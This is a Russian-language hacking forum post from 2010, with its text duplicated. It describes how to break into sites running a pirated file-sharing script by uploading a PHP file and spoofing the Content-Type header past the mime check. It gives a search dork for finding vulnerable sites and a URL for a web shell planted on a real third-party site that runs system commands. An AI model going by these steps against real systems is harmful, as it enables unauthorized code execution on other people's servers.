Ponchik
15.09.2010, 20:12
Тестил вот этот, зануленый
http://www.nulled.ws/attachment.php?attachmentid=15074&d=1225918711
Реги там нет, сам невижу что там, мне emillord дал ссыль на свой обменик, я захекал
Заливаем .php файл с phpinfo() и скачиваем, предлагает сохранить, но там будет результат
Если скрипт ругается, что недопустимый тип:
Скрипт берёт mime type из массива $_FILES а там mime type берётся из вашего запроса к серверу, сниффаем, меняем
Content-Type: ocet/stream (или чего оно там у вас)
на
Content-Type: text/plain
пых файл заливается, запускается... всё
исходники вам показать немогу, лень и нет у меня их, нет реги на нулледе, но emillord сказал он тама качал
ну как-то так...
===========
дорк inurl:view-file.html?file=
первая ссылка - ломаеца как задумывалось
токо я из phpinfo взял прямой путь, вот
http://www.sharefile.org/storage/1iecwexb3ibhfsc2ubceacg7zwitr5.php?c=echo%20'%3Cpr e%3E';system('ls%20-al');%20exit;
какой-то школьник снёс
http://www.nulled.ws/attachment.php?attachmentid=15074&d=1225918711
Реги там нет, сам невижу что там, мне emillord дал ссыль на свой обменик, я захекал
Заливаем .php файл с phpinfo() и скачиваем, предлагает сохранить, но там будет результат
Если скрипт ругается, что недопустимый тип:
Скрипт берёт mime type из массива $_FILES а там mime type берётся из вашего запроса к серверу, сниффаем, меняем
Content-Type: ocet/stream (или чего оно там у вас)
на
Content-Type: text/plain
пых файл заливается, запускается... всё
исходники вам показать немогу, лень и нет у меня их, нет реги на нулледе, но emillord сказал он тама качал
ну как-то так...
===========
дорк inurl:view-file.html?file=
первая ссылка - ломаеца как задумывалось
токо я из phpinfo взял прямой путь, вот
http://www.sharefile.org/storage/1iecwexb3ibhfsc2ubceacg7zwitr5.php?c=echo%20'%3Cpr e%3E';system('ls%20-al');%20exit;
какой-то школьник снёс